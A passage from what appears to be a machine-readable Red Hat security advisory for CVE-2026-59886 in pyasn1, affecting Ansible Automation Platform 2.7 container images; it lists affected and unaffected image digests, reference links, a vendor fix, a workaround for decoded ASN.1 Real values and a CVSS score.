"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "RHBZ#2500041",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500041"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59886",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59886"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886",
"url": "https://github.com/pyasn1/pyasn1/commit/e60c691cb91addb8fcefa2f537e85ede6fb1e886"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4"
},
{
"category": "external",
"summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-hm4w-wwcw-mr6r"
}
],
"release_date": "2026-07-14T16:38:29.691000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "When processing untrusted ASN.1 data with pyasn1, avoid calling prettyPrint(), str(), float(), int(), or performing comparisons or arithmetic on decoded Real (ASN.1 REAL type) objects. Instead, inspect the raw (mantissa, base, exponent) tuple directly. Where logging decoded ASN.1 structures is necessary, filter out or sanitize Real-typed values before conversion.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
